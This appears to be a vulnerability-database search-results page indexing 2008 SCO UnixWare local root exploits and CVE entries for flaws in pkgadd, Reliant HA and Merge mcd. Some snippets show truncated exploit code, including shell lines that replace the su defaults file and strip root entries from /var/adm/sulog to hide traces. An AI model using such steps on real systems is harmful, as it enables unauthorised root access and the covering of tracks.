418 matches found
CVE-2008-0310
Directory traversal vulnerability in pkgadd in SCO UnixWare 7.1.4 before p534589 allows local users to create or append to arbitrary files via ".." sequences in an unspecified environment variable, probably PKGINST...
iDefense Security Advisory 04.03.08: SCO UnixWare pkgadd Directory Traversal Vulnerability
iDefense Security Advisory 04.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 03, 2008 I. BACKGROUND SCO UnixWare is a UNIX operating system that runs on many OEM platforms. The pkgadd command is used to install packages on the system. More information about the product is...
SCO UnixWare Reliant HA Local Root Exploit
No description provided by source. / 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Reliant HA Local Root Exploit By qaaz / include stdio.h include stdlib.h include string.h include unistd.h include errno.h include fcntl.h define TGT1...
SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit
No description provided by source. !/bin/ksh 04/2008: public release SCO UnixWare 7.1.4 p534589 if id -un = 'root' ; then grep -v " $1-root$" /var/adm/sulog su.log cp su.def /etc/default/su cp su.log /var/adm/sulog rm -f su.def su.log woot.log else echo "------------------------------------"...
SCO Unixware pkgadd directory traversal
It's possible to access any system files...
SCO UnixWare Merge mcd Local Root Exploit
No description provided by source. / 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Merge mcd Local Root Exploit By qaaz / include stdio.h include stdlib.h include string.h include unistd.h include errno.h include sys/stat.h...
SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation
/ 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Reliant HA Local Root Exploit By qaaz / include include include include include include define TGT1 "/usr/opt/reliant/bin/hvdisp" define TGT2 "/usr/opt/reliant/bin/rcvm" define DIR "bin" define B...
scoreliant-local.txt
/ 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Reliant HA Local Root Exploit By qaaz / include include include include include include define TGT1 "/usr/opt/reliant/bin/hvdisp" define TGT2 "/usr/opt/reliant/bin/rcvm" define DIR "bin" define B...
SCO UnixWare Merge - 'mcd' Local Privilege Escalation
/ 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Merge mcd Local Root Exploit By qaaz / include include include include include include define TARGET "/usr/lib/merge/mcd" define DIR "/proc/%d/object", getpid define BIN "a.out" define LNK "hrc;"...
SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Local Privilege Escalation
!/bin/ksh 04/2008: public release SCO UnixWare su.log cp su.def /etc/default/su cp su.log /var/adm/sulog rm -f su.def su.log woot.log else echo "------------------------------------" echo " UnixWare pkgadd Local Root Exploit" echo " By qaaz" echo "------------------------------------" EVIL=echo...
SCO UnixWare Merge mcd Local Root Exploit
Exploit for sco platform in category local exploits ========================================= SCO UnixWare Merge mcd Local Root Exploit ========================================= / 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Merge mcd Local...
scomerge-local.txt
/ 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Merge mcd Local Root Exploit By qaaz / include include include include include include define TARGET "/usr/lib/merge/mcd" define DIR "/proc/%d/object", getpid define BIN "a.out" define LNK "hrc;"...
SCO UnixWare Reliant HA Local Root Exploit
Exploit for sco platform in category local exploits ========================================== SCO UnixWare Reliant HA Local Root Exploit ========================================== / 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Reliant HA Loc...
SCO UnixWare 7.1.4 p534589 - pkgadd Local Privilege Escalation
SCO UnixWare 7.1.4 p534589 - pkgadd Local Privilege Escalation !/bin/ksh 04/2008: public release SCO UnixWare su.log cp su.def /etc/default/su cp su.log /var/adm/sulog rm -f su.def su.log woot.log else echo "------------------------------------" echo " UnixWare pkgadd Local Root Exploit" echo " B...
SCO UnixWare Merge - mcd Local Privilege Escalation
SCO UnixWare Merge - mcd Local Privilege Escalation / 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Merge mcd Local Root Exploit By qaaz / include include include include include include define TARGET "/usr/lib/merge/mcd" define DIR...
SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation
SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation / 04/2008: public release I have'nt seen any advisory on this; possibly still not fixed. SCO UnixWare Reliant HA Local Root Exploit By qaaz / include include include include include include define TGT1 "/usr/opt/reliant/bin/hvdisp" define...
scopkgadd-local.txt
!/bin/ksh 04/2008: public release SCO UnixWare su.log cp su.def /etc/default/su cp su.log /var/adm/sulog rm -f su.def su.log woot.log else echo "------------------------------------" echo " UnixWare pkgadd Local Root Exploit" echo " By qaaz" echo "------------------------------------" EVIL=echo...
SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit
Exploit for sco platform in category local exploits ======================================================== SCO UnixWare su.log cp su.def /etc/default/su cp su.log /var/adm/sulog rm -f su.def su.log woot.log else echo "------------------------------------" echo " UnixWare pkgadd Local Root...
CVE-2008-1343
Directory traversal vulnerability in 1 pkgadd and 2 pkgrm in SCO UnixWare 7.1.4 allows local users to gain privileges via unknown vectors...
Directory traversal
Directory traversal vulnerability in 1 pkgadd and 2 pkgrm in SCO UnixWare 7.1.4 allows local users to gain privileges via unknown vectors...